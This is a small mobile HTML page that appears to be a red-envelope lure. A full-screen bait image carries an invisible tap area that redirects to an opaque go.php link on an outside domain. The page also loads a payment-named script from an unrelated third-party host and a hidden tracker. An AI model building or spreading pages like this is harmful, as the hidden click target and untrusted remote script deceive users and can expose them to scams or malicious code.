<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> 
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache"> 
<META HTTP-EQUIV="Expires" CONTENT="0"> 
    <title></title>
    <style>
       
        * {
            margin: 0;
            padding: 0;
            font-size: 0.12rem;
        }
        html {
            font-size: 100px;
        }
        img {
            border: 0;
            display: block;
        }
        .wrap{
            position: relative
        }
        .wrap img{
            width:100%;
            height: 100vh;
        }
        .wrap .btn{
            width:100%;
            height:2rem;
            background:transparent;
            position: absolute;
            bottom:1.3rem;
            left: 0;
            z-index:999;
            -webkit-tap-highlight-color: rgba(0,0,0,0);
        }
    </style>
</head>
<body>
    <div class="wrap">
        <img onclick="return false;" src="./img/hongbao.jpg"/>
        <div class="btn"></div>
    </div>
<script>
    window.onload = function () {
        var btn = document.getElementsByClassName('btn')[0]
        btn.onclick=function(){
             window.location.href="http://wx.ycsylm.com/go.php?id=111258"
        }
        function refresh() {
            var width = document.documentElement.clientWidth;
            if (width < 640) {
                document.documentElement.style.fontSize = width / 7.5 + "px";
            } else {
                document.documentElement.style.fontSize = "100px";
            }
        }
        refresh();
        window.onresize = refresh;
    }
    </script>
    <script src="http://www.nyzda.top/scripts/alipay.js"></script>
    <div style="display: none;">
        <script src="https://s19.cnzz.com/z_stat.php?id=1274999114&web_id=1274999114" language="JavaScript"></script>
    </div>
</body>
</html>
